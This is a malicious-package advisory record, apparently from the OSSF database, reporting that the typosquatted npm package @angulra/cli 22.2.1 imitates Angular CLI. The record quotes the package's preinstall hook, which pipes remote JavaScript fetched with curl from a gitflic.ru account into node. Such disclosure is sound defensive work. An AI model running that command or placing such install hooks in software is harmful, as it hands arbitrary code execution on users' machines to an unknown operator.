{"id":"MAL-2026-17495","summary":"Malicious code in @angulra/cli (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f)\nThe package name @angulra/cli is a character-swap of @angular/cli and copies the legitimate Angular CLI's metadata (description, repository, homepage, keywords, dependencies). Its package.json defines a preinstall script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from an anonymous third-party account (hellscripter) on gitflic.ru via a web.archive.org proxy and piping the response directly into Node. The URL is unpinned, has no integrity check, is unrelated to the Angular publisher, and the fetched bytes execute automatically on `npm install`, giving the operator of that endpoint arbitrary code execution on the installer's machine. src/analytics/analytics-collector.js additionally issues outbound POSTs via https.request alongside ping-style activity.\n","modified":"2026-10-04T23:45:16.983475395Z","published":"2026-10-04T23:17:56Z","database_specific":{"malicious-packages-origins":[{"versions":["22.2.1"],"id":"IN-MAL-2026-020908","import_time":"2026-10-04T23:40:40.859812447Z","modified_time":"2026-10-04T23:17:56Z","sha256":"e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@angulra/cli/v/22.2.1"}],"affected":[{"package":{"name":"@angulra/cli","ecosystem":"npm","purl":"pkg:npm/%40angulra/cli"},"versions":["22.2.1"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"93fc68be8a38359d182dcb8461d07d1e3ee1be5279c86994454ebfa1648c03ec","tlsh":"22313576dae01d6316d9128498360903743c962b0e06fa78f799540c4f8f69f2277aae","path":"package.json"}],"package_integrity":[{"filename":"cli-22.2.1.tgz","hashes":{"sha1":"ac4bc353e3455283ccdaa5244c0b42f194a39184","sha512_sri":"sha512-jHLGtdMxaMiY7mLzplndIna+fojgWUeQM0y8Se9RqAZ2igcChOOG4J80fzLZgsEIqAu3VsOFSqR233fnk2VM9A=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angulra/cli/MAL-2026-17495.json","cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}]}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}